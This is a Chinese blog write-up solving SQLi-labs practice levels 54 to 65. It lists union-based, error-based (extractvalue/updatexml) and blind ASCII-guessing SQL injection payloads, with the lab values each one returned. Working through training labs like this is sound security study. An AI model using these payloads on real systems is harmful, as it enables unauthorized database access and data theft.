当前位置: 开发笔记 > 编程语言 > 正文

SQLILABS靶场通过小记(54~65)

作者：hahah | 来源：互联网 | 2023-09-24 11:47

篇首语：本文由编程笔记#小编为大家整理，主要介绍了SQLI-LABS靶场通过小记(54~65)相关的知识，希望对你有一定的参考价值。54~65

篇首语：本文由编程笔记#小编为大家整理，主要介绍了SQLI-LABS 靶场通过小记(54~65)相关的知识，希望对你有一定的参考价值。

54~65

- - - Less-54:
    - - 1.查询数据库
      - 2.查询表
      - 3.查询字段
      - 4.查询数据
    - Less-55:
    - Less-56:
    - Less-57:
    - Less-58:
    - - 1.报错注入查询库名
      - 2.查询表名
      - 3.查询字段
      - 4.查询数据
    - Less-59:
    - Less-60:
    - Less-61:
    - Less-62:
    - - 1.判断数据库名的长度
      - 2.利用ascii码猜测数据库名
    - Less-63:
    - Less-64:
    - Less-65:
:cherry_blossom:完结撒花:cherry_blossom:
1~65&＃xff0c;堆叠注入和报错注入挺让人头疼的所以我写的比较简单&＃xff0c;为了做出这65道题翻阅了有7&＃xff0c;8篇博客&＃xff08;因为我比较菜&＃xff09;:hugs:&＃xff0c;做完这65道题收获还是蛮多的&＃xff0c;也更让我深刻的认识到了自身的不足&＃xff0c;还是需要继续“好好学习&＃xff0c;天天向上”啊:books::pencil2::books::pencil2:&＃xff01;

Less-54:

1.查询数据库

?id&＃61;-1&＃39; union select 1,database(),3 -- qwe //库&＃xff1a;challenges

2.查询表

?id&＃61;-1&＃39; union select 1,group_concat(table_name),3 from information_schema.tables where table_schema&＃61;&＃39;challenges&＃39; -- qwe //表&＃xff1a;0HH6JD95U8

3.查询字段

?id&＃61;-1&＃39; union select 1,group_concat(column_name),3 from information_schema.columns where table_schema&＃61;&＃39;challenges&＃39; and table_name&＃61;&＃39;0HH6JD95U8&＃39; -- qwe //字段&＃xff1a;id,sessid,secret_IK8H,tryy

4.查询数据

?id&＃61;-1&＃39; union select 1,group_concat(secret_IK8H),3 from 0HH6JD95U8 -- qwe //key&＃xff1a;5TyUvzJndld9x4XamGn09368

Less-55:

和54题相同&＃xff0c;只不过需要括号)闭合

?id&＃61;-1) union select 1,2,3 -- qwe

Less-56:

与54题相同&＃xff0c;只不过需要单引号括号&＃39;)闭合

?id&＃61;-1&＃39;) union select 1,2,3 -- qwe

Less-57:

与54题相同&＃xff0c;只不过这道题需要双引号"闭合

?id&＃61;-1" union select 1,2,3 -- qwe

Less-58:

通过在id后加反斜杠&＃xff0c;发现需要单引号&＃39;闭合&＃xff0c;经过测试不能通过union进行联合查询&＃xff0c;但是会产生报错信息&＃xff0c;使用报错注入

1.报错注入查询库名

?id&＃61;-1&＃39; and extractvalue(1, concat(0x5c, (select database()))) -- qwe //库名&＃xff1a;challenges

2.查询表名

?id&＃61;-1&＃39; and updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema&＃61;&＃39;challenges&＃39; limit 0,1)),0) -- qwe //表&＃xff1a;46AZEIPRHM 199S5PGWIH

3.查询字段

?id&＃61;-1&＃39; and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema&＃61;&＃39;challenges&＃39; and table_name&＃61;&＃39;199S5PGWIH&＃39; limit 0,1),0x7e),1) -- qwe //字段&＃xff1a;id,sessid,secret_QGRQ,tryy

4.查询数据

?id&＃61;-1&＃39; and updatexml(1,concat(0x7e,(select secret_QGRQ from 199S5PGWIH limit 0,1),0x7e),1) -- qwe //数据&＃xff1a;eqF0rqlhQso5Ce2DtnCtJ3JU

Less-59:

与58题相同&＃xff0c;不用单引号闭合

/?id&＃61;-1 and extractvalue(1, concat(0x5c, (select database()))) -- qwe

Less-60:

与58题相同&＃xff0c;只不过需要使用双引号括号")闭合

?id&＃61;-1") and extractvalue(1, concat(0x5c, (select database()))) -- qwe

Less-61:

与58题相同&＃xff0c;这题需要使用单引号括号括号&＃39;))闭合

?id&＃61;-1&＃39;)) and extractvalue(1, concat(0x5c, (select database()))) -- qwe

Less-62:

使用&＃39;)闭合&＃xff0c;在130次内完成盲注

1.判断数据库名的长度

?id&＃61;1&＃39;) and length(database()&＃61;10) -- qwe //正常说明是长度是10

2.利用ascii码猜测数据库名

?id&＃61;1&＃39;) and ascii(substr(database(),1,1))&＃61;99 -- qwe c ?id&＃61;1&＃39;) and ascii(substr(database(),2,1))&＃61;104 -- qwe h ............阿巴阿巴太多了&＃xff0c;以此类推吧

Less-63:

与62题相同&＃xff0c;使用单引号闭合

?id&＃61;1&＃39; and ascii(substr(database(),1,1))&＃61;99 -- qwe c

Less-64:

与62题相同&＃xff0c;使用括号括号))闭合

?id&＃61;1)) and ascii(substr(database(),1,1))&＃61;99 -- qwe

Less-65:

无需闭合

?id&＃61;1 and ascii(substr(database(),1,1))&＃61;99 -- qwe

&＃x1f338;完结撒花&＃x1f338;
1~65&＃xff0c;堆叠注入和报错注入挺让人头疼的所以我写的比较简单&＃xff0c;为了做出这65道题翻阅了有7&＃xff0c;8篇博客&＃xff08;因为我比较菜&＃xff09;&＃x1f917;&＃xff0c;做完这65道题收获还是蛮多的&＃xff0c;也更让我深刻的认识到了自身的不足&＃xff0c;还是需要继续“好好学习&＃xff0c;天天向上”啊&＃x1f4da;✏️&＃x1f4da;✏️&＃xff01;

推荐阅读

utf-8
Python 使用 DOM 和 SAX 解析 XML 的应用实例

本文介绍如何使用 Python 的 DOM 和 SAX 方法解析 XML 文件，并通过示例展示了如何动态创建数据库表和处理大量数据的实时插入。 ... [详细]

蜡笔小新 2024-11-12 16:10:39
timestamp
MySQL 5.7 学习指南：SQLyog 中的主键、列属性和数据类型

本文介绍了 MySQL 5.7 中主键（Primary Key）和自增（Auto-Increment）的概念，以及如何在 SQLyog 中设置这些属性。同时，还探讨了数据类型的分类和选择，以及列属性的设置方法。 ... [详细]

蜡笔小新 2024-11-12 15:57:04
utf-8
php更新数据库字段的函数是,php更新数据库字段的函数是

php更新数据库字段的函数是,php更新数据库字段的函数是 ... [详细]

蜡笔小新 2024-11-12 11:37:31
ip
开机自启动的几种方式

0x01快速自启动目录快速启动目录自启动方式源于Windows中的一个目录，这个目录一般叫启动或者Startup。位于该目录下的PE文件会在开机后进行自启动 ... [详细]

蜡笔小新 2024-11-12 11:16:30
select
掌握MySQL数据库的基础语法与核心操作

本文详细介绍了MySQL数据库的基础语法与核心操作，涵盖从基础概念到具体应用的多个方面。首先，文章从基础知识入手，逐步深入到创建和修改数据表的操作。接着，详细讲解了如何进行数据的插入、更新与删除。在查询部分，不仅介绍了DISTINCT和LIMIT的使用方法，还探讨了排序、过滤和通配符的应用。此外，文章还涵盖了计算字段以及多种函数的使用，包括文本处理、日期和时间处理及数值处理等。通过这些内容，读者可以全面掌握MySQL数据库的核心操作技巧。 ... [详细]

蜡笔小新 2024-11-11 23:39:51
ip
InfluxDB、collectd与Grafana的详细安装与配置指南

本文详细介绍了 InfluxDB、collectd 和 Grafana 的安装与配置流程。首先，按照启动顺序依次安装并配置 InfluxDB、collectd 和 Grafana。InfluxDB 作为时序数据库，用于存储时间序列数据；collectd 负责数据的采集与传输；Grafana 则用于数据的可视化展示。文中提供了 collectd 的官方文档链接，便于用户参考和进一步了解其配置选项。通过本指南，读者可以轻松搭建一个高效的数据监控系统。 ... [详细]

蜡笔小新 2024-11-11 19:54:24
tree
大类|电阻器_使用Requests、Etree、BeautifulSoup、Pandas和Path库进行数据抓取与处理 | 将指定区域内容保存为HTML和Excel格式

大类|电阻器_使用Requests、Etree、BeautifulSoup、Pandas和Path库进行数据抓取与处理 | 将指定区域内容保存为HTML和Excel格式 ... [详细]

蜡笔小新 2024-11-11 19:05:59
io
深入解析Struts、Spring与Hibernate三大框架的面试要点与技巧

深入解析Struts、Spring与Hibernate三大框架的面试要点与技巧 ... [详细]

蜡笔小新 2024-11-11 13:09:30
timestamp
Cacti 数据库错误：SQL 查询失败，错误代码 145

在使用 Cacti 进行监控时，发现已运行的转码机未产生流量，导致 Cacti 监控界面显示该转码机处于宕机状态。进一步检查 Cacti 日志，发现数据库中存在 SQL 查询失败的问题，错误代码为 145。此问题可能是由于数据库表损坏或索引失效所致，建议对相关表进行修复操作以恢复监控功能。 ... [详细]

蜡笔小新 2024-11-11 12:57:49
import
自定义 Android 圆形进度条视图，支持显示数字和中心文字

本文介绍了一种自定义的Android圆形进度条视图，支持在进度条上显示数字，并在圆心位置展示文字内容。通过自定义绘图和组件组合的方式实现，详细展示了自定义View的开发流程和关键技术点。示例代码和效果展示将在文章末尾提供。 ... [详细]

蜡笔小新 2024-11-10 13:04:42
io
18. ChartData类详解（MPAndroidChart中文版解析）

在《ChartData类详解》一文中，我们将深入探讨 MPAndroidChart 中的 ChartData 类。本文将详细介绍如何设置图表颜色（Setting Colors）以及如何格式化数据值（Formatting Data Values），通过 ValueFormatter 的使用来提升图表的可读性和美观度。此外，我们还将介绍一些高级配置选项，帮助开发者更好地定制和优化图表展示效果。 ... [详细]

蜡笔小新 2024-11-09 20:54:36
select
Axublog 1.1.0 版本 c_login.php 文件中发现 SQL 注入安全漏洞

在 Axublog 1.1.0 版本的 `c_login.php` 文件中发现了一个严重的 SQL 注入漏洞。该漏洞允许攻击者通过操纵登录请求中的参数，注入恶意 SQL 代码，从而可能获取敏感信息或对数据库进行未授权操作。建议用户尽快更新到最新版本并采取相应的安全措施以防止潜在的风险。 ... [详细]

蜡笔小新 2024-11-09 13:37:09
io
在Ubuntu系统中安装Android SDK的详细步骤及解决“Failed to fetch URL https://dlssl.google.com/”错误的方法

在Ubuntu 11.10 x64系统中安装Android SDK的详细步骤，包括配置环境变量和解决“Failed to fetch URL https://dlssl.google.com/”错误的方法。本文详细介绍了如何在该系统上顺利安装并配置Android SDK，确保开发环境的稳定性和高效性。此外，还提供了解决网络连接问题的实用技巧，帮助用户克服常见的安装障碍。 ... [详细]

蜡笔小新 2024-11-09 03:04:54
import
详解Android连接MySQL数据库的操作流程及技术要点

在Android应用开发中，实现与MySQL数据库的连接是一项重要的技术任务。本文详细介绍了Android连接MySQL数据库的操作流程和技术要点。首先，Android平台提供了SQLiteOpenHelper类作为数据库辅助工具，用于创建或打开数据库。开发者可以通过继承并扩展该类，实现对数据库的初始化和版本管理。此外，文章还探讨了使用第三方库如Retrofit或Volley进行网络请求，以及如何通过JSON格式交换数据，确保与MySQL服务器的高效通信。 ... [详细]

蜡笔小新 2024-11-07 19:11:13
io
SSH集成过程中常见问题及解决方案

在使用SSH框架进行项目开发时，经常会遇到一些常见的问题。例如，在Spring配置文件中配置AOP事务声明后，进行单元测试时可能会出现“No Hibernate Session bound to thread”的错误。本文将详细探讨这一问题的原因，并提供有效的解决方案，帮助开发者顺利解决此类问题。 ... [详细]

蜡笔小新 2024-11-07 03:17:49

hahah

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章